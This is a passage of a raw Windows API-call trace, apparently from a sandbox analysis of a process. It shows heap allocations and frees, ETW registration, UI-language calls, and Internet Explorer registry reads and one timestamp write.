BaseAddress=0x479b00) returned 1 [0316.359] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x498dc0) returned 1 [0316.360] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x4) returned 0x479b80 [0316.360] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x190) returned 0x498bd8 [0316.360] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x494f28 [0316.360] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x494f28) returned 1 [0316.361] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x190) returned 0x498d70 [0316.361] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x48dad8 [0316.361] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x479b80) returned 1 [0316.361] memcpy (in: _Dst=0x112eba4, _Src=0x4608e3, _Size=0x2 | out: _Dst=0x112eba4) returned 0x112eba4 [0316.361] memcpy (in: _Dst=0x112eba4, _Src=0x4608e5, _Size=0x2 | out: _Dst=0x112eba4) returned 0x112eba4 [0316.361] memcpy (in: _Dst=0x112eba4, _Src=0x4608e7, _Size=0x2 | out: _Dst=0x112eba4) returned 0x112eba4 [0316.362] memcpy (in: _Dst=0x112eba4, _Src=0x4608e9, _Size=0x2 | out: _Dst=0x112eba4) returned 0x112eba4 [0316.362] memcpy (in: _Dst=0x112eba4, _Src=0x499e68, _Size=0x4 | out: _Dst=0x112eba4) returned 0x112eba4 [0316.363] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x498bd8) returned 1 [0316.365] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x499210) returned 1 [0316.365] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x498d70) returned 1 [0316.366] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48dad8) returned 1 [0316.366] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48dc88) returned 1 [0316.367] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48d958) returned 1 [0316.367] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x498a00) returned 1 [0316.367] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x478ee8 [0316.368] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x16) returned 0x484448 [0316.368] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484448) returned 1 [0316.368] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x478ee8) returned 1 [0316.368] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x478a68 [0316.368] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x16) returned 0x484568 [0316.368] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484568) returned 1 [0316.369] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x478a68) returned 1 [0316.369] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x58) returned 0x494078 [0316.369] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x22) returned 0x48d868 [0316.369] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48d868) returned 1 [0316.370] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x494078) returned 1 [0316.370] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x58) returned 0x4939b8 [0316.370] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x22) returned 0x48dc28 [0316.371] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48dc28) returned 1 [0316.371] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4939b8) returned 1 [0316.453] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x34) returned 0x495e90 [0316.453] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x38) returned 0x496150 [0316.455] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x479b10 [0316.455] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8c) returned 0x497730 [0316.455] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x479b10) returned 1 [0316.462] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c) returned 0x482590 [0316.462] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2c) returned 0x494228 [0316.463] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x494228) returned 1 [0316.463] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2c) returned 0x494880 [0316.476] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x494880) returned 1 [0316.476] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x482590) returned 1 [0316.478] GetModuleHandleW (lpModuleName="ntdll") returned 0x77840000 [0316.478] GetProcAddress (hModule=0x77840000, lpProcName="EtwEventRegister") returned 0x7788d530 [0316.478] GetProcAddress (hModule=0x77840000, lpProcName="EtwEventUnregister") returned 0x77897cb0 [0316.478] GetProcAddress (hModule=0x77840000, lpProcName="EtwEventWrite") returned 0x778a0920 [0316.478] GetProcAddress (hModule=0x77840000, lpProcName="EtwEventActivityIdControl") returned 0x7789dc30 [0316.478] GetProcAddress (hModule=0x77840000, lpProcName="EtwEventWriteTransfer") returned 0x778a43b0 [0316.479] GetProcAddress (hModule=0x77840000, lpProcName="EtwEventEnabled") returned 0x778a64b0 [0316.479] EtwEventRegister (in: ProviderId=0x6fc14638, EnableCallback=0x0, CallbackContext=0x0, RegHandle=0x6fc6d550 | out: RegHandle=0x6fc6d550) returned 0x0 [0316.479] EtwEventWrite (RegHandle=0x469dc8, EventDescriptor=0x38, UserDataCount=0x6fc14648, UserData=0x5) returned 0x0 [0316.485] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x48dc28 [0316.485] ?AddRef@?$CImpl@UIWbemObjectTextSrc@@VCWmiObjectTextSrc@@@@UAGKXZ () returned 0x1 [0316.512] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x78) returned 0x48a650 [0316.512] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4813c8 [0316.513] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4813c8) returned 1 [0316.513] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x482180 [0316.513] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484348 [0316.513] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484568 [0316.513] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4843e8 [0316.513] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4845a8 [0316.513] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484368 [0316.513] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484608 [0316.514] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x4813c8 [0316.514] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1ec) returned 0x49e1e0 [0316.514] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4813c8) returned 1 [0316.522] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x6c) returned 0x48fc50 [0316.522] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2c) returned 0x4947d8 [0316.523] RtlRestoreLastWin32Error () returned 0x280000 [0316.523] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x112ecd4, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x112ec78 | out: pulNumLanguages=0x112ecd4, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x112ec78) returned 1 [0316.523] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x479b60 [0316.523] RtlRestoreLastWin32Error () returned 0x280000 [0316.523] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x112ecd4, pwszLanguagesBuffer=0x479b60, pcchLanguagesBuffer=0x112ec78 | out: pulNumLanguages=0x112ecd4, pwszLanguagesBuffer=0x479b60, pcchLanguagesBuffer=0x112ec78) returned 1 [0316.523] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x479be0 [0316.523] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x479b60) returned 1 [0316.523] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x484248 [0316.523] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x484248, pulNumLanguages=0x112ecd4 | out: pulNumLanguages=0x112ecd4) returned 1 [0316.523] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484248) returned 1 [0316.523] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x78) returned 0x48b150 [0316.524] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484448 [0316.524] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484488 [0316.524] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484628 [0316.524] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4844a8 [0316.524] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484528 [0316.525] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484508 [0316.525] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x482478 [0316.528] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x36) returned 0x495f90 [0316.528] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2a) returned 0x494848 [0316.528] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x494848) returned 1 [0316.528] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x16) returned 0x4844e8 [0316.528] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4844e8) returned 1 [0316.529] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x495f90) returned 1 [0316.538] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x4813c8 [0316.540] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1ec) returned 0x4a7c68 [0316.540] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4813c8) returned 1 [0316.542] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1ec) returned 0x4a8278 [0316.542] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1ec) returned 0x4a8770 [0316.543] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a8278) returned 1 [0316.543] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x190) returned 0x4a7e60 [0316.543] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a8770) returned 1 [0316.544] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a7c68) returned 1 [0316.544] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x4c) returned 0x48bf20 [0316.545] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4813c8 [0316.545] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Internet Explorer\\", ulOptions=0x0, samDesired=0x1, phkResult=0x112eaec | out: phkResult=0x112eaec*=0x2fc) returned 0x0 [0316.545] RegQueryValueExW (in: hKey=0x2fc, lpValueName="Version", lpReserved=0x0, lpType=0x112eab0, lpData=0x0, lpcbData=0x112eab4*=0x0 | out: lpType=0x112eab0*=0x1, lpData=0x0, lpcbData=0x112eab4*=0x1a) returned 0x0 [0316.546] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x38) returned 0x495e10 [0316.546] RegQueryValueExW (in: hKey=0x2fc, lpValueName="Version", lpReserved=0x0, lpType=0x112eab0, lpData=0x495e10, lpcbData=0x112eab4*=0x1c | out: lpType=0x112eab0*=0x1, lpData="9.11.19041.0", lpcbData=0x112eab4*=0x1a) returned 0x0 [0316.546] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1e) returned 0x482518 [0316.546] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x48c3f0 [0316.546] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x28) returned 0x48de68 [0316.547] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48de68) returned 1 [0316.547] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2c) returned 0x494228 [0316.548] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x494228) returned 1 [0316.548] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48c3f0) returned 1 [0316.548] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x482518) returned 1 [0316.549] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x495e10) returned 1 [0316.549] RegCloseKey (hKey=0x2fc) returned 0x0 [0316.550] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x482518 [0316.550] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x44) returned 0x492428 [0316.550] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x32) returned 0x496110 [0316.550] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x496110) returned 1 [0316.550] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x462c30 [0316.551] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x462c30) returned 1 [0316.552] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x492428) returned 1 [0316.552] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x482518) returned 1 [0316.582] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4813c8) returned 1 [0316.582] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48bf20) returned 1 [0316.583] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a7e60) returned 1 [0316.583] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x482478) returned 1 [0316.584] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484448) returned 1 [0316.584] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484488) returned 1 [0316.584] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484628) returned 1 [0316.584] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4844a8) returned 1 [0316.584] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484528) returned 1 [0316.584] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484508) returned 1 [0316.585] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48b150) returned 1 [0316.585] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x4) returned 0x479b90 [0316.585] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x479b90, pulNumLanguages=0x112ecd8 | out: pulNumLanguages=0x112ecd8) returned 1 [0316.585] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x479b90) returned 1 [0316.585] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x479be0) returned 1 [0316.586] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x482180) returned 1 [0316.586] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484348) returned 1 [0316.586] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484568) returned 1 [0316.586] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4843e8) returned 1 [0316.586] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4845a8) returned 1 [0316.586] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484368) returned 1 [0316.587] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484608) returned 1 [0316.587] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48a650) returned 1 [0316.588] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x49e1e0) returned 1 [0316.597] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4947d8) returned 1 [0316.597] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48fc50) returned 1 [0316.641] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x78) returned 0x48a650 [0316.641] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4813c8 [0316.642] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4813c8) returned 1 [0316.642] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4a32a0 [0316.642] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4843e8 [0316.642] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484448 [0316.642] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4844a8 [0316.642] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4845c8 [0316.642] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484348 [0316.642] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4842a8 [0316.643] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x4813c8 [0316.643] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1ec) returned 0x4a9310 [0316.643] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4813c8) returned 1 [0316.643] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x6c) returned 0x49e360 [0316.644] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2c) returned 0x4943e8 [0316.644] RtlRestoreLastWin32Error () returned 0x280000 [0316.644] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x112ecd4, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x112ec78 | out: pulNumLanguages=0x112ecd4, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x112ec78) returned 1 [0316.644] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x479bc0 [0316.644] RtlRestoreLastWin32Error () returned 0x280000 [0316.644] GetThreadPreferredUILanguages (in: dwFlags=0x40, pulNumLanguages=0x112ecd4, pwszLanguagesBuffer=0x479bc0, pcchLanguagesBuffer=0x112ec78 | out: pulNumLanguages=0x112ecd4, pwszLanguagesBuffer=0x479bc0, pcchLanguagesBuffer=0x112ec78) returned 1 [0316.644] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8) returned 0x479b00 [0316.644] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x479bc0) returned 1 [0316.644] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x484368 [0316.644] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x484368, pulNumLanguages=0x112ecd4 | out: pulNumLanguages=0x112ecd4) returned 1 [0316.644] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484368) returned 1 [0316.645] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x78) returned 0x48ad50 [0316.645] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484568 [0316.645] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484468 [0316.645] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484528 [0316.645] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484368 [0316.646] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x484388 [0316.646] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4845a8 [0316.646] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4a3430 [0316.647] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x36) returned 0x496190 [0316.647] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2a) returned 0x494650 [0316.647] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x494650) returned 1 [0316.647] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x16) returned 0x484308 [0316.647] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484308) returned 1 [0316.648] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x496190) returned 1 [0316.659] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xc) returned 0x4813c8 [0316.660] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1ec) returned 0x4a9508 [0316.660] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4813c8) returned 1 [0316.662] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1ec) returned 0x4b27a0 [0316.662] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1ec) returned 0x4b2998 [0316.662] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4b27a0) returned 1 [0316.663] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x190) returned 0x4b27a0 [0316.663] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4b2998) returned 1 [0316.664] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a9508) returned 1 [0316.714] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x54) returned 0x493bf8 [0316.715] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x3e) returned 0x4a8d10 [0316.717] GetTickCount () returned 0x1e80faa [0316.717] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Internet Explorer\\Main", ulOptions=0x0, samDesired=0x2, phkResult=0x112ead8 | out: phkResult=0x112ead8*=0x2fc) returned 0x0 [0316.717] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4a8da0 [0316.718] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x24) returned 0x48de38 [0316.718] SafeArrayGetElemsize (psa=0x48de78) returned 0x1 [0316.718] SafeArrayAccessData (in: psa=0x48de78, ppvData=0x112e8d4 | out: ppvData=0x112e8d4) returned 0x0 [0316.718] memcpy (in: _Dst=0x479b10, _Src=0x49e057, _Size=0x8 | out: _Dst=0x479b10) returned 0x479b10 [0316.718] SafeArrayUnaccessData (psa=0x48de78) returned 0x0 [0316.719] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48de38) returned 1 [0316.719] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a8da0) returned 1 [0316.719] RegSetValueExW (in: hKey=0x2fc, lpValueName="IE10RunOnceLastShown_TIMESTAMP", Reserved=0x0, dwType=0x3, lpData=0x479b10*, cbData=0x8 | out: lpData=0x479b10*) returned 0x0 [0316.720] RegCloseKey (hKey=0x2fc) returned 0x0 [0316.720] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4a3390 [0316.720] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x44) returned 0x492478 [0316.720] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x32) returned 0x496010 [0316.721] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x496010) returned 1 [0316.721] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x20) returned 0x4a3200 [0316.721] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a3200) returned 1 [0316.722] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x492478) returned 1 [0316.722] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a3390) returned 1 [0316.728] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a8d10) returned 1 [0316.728] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x493bf8) returned 1 [0316.729] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4b27a0) returned 1 [0316.729] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a3430) returned 1 [0316.729] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484568) returned 1 [0316.729] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484468) returned 1 [0316.730] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484528) returned 1 [0316.730] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484368) returned 1 [0316.730] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484388) returned 1 [0316.730] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4845a8) returned 1 [0316.730] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48ad50) returned 1 [0316.731] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x4) returned 0x479a40 [0316.731] SetThreadPreferredUILanguages (in: dwFlags=0x8, pwszLanguagesBuffer=0x479a40, pulNumLanguages=0x112ecd8 | out: pulNumLanguages=0x112ecd8) returned 1 [0316.731] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x479a40) returned 1 [0316.731] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x479b00) returned 1 [0316.731] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a32a0) returned 1 [0316.731] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4843e8) returned 1 [0316.731] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484448) returned 1 [0316.732] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4844a8) returned 1 [0316.732] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4845c8) returned 1 [0316.732] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x484348) returned 1 [0316.732] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4842a8) returned 1 [0316.733] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x48a650) returned 1 [0316.733] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4a9310) returned 1 [0316.761] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x4943e8) returned 1 [0316.762] RtlFreeHeap (HeapHandle=0x450000, Flags=0x0, BaseAddress=0x49e360) returned 1 Thread: id = 89 os_tid = 0x3a0 Thread: id = 90 os_tid = 0x1624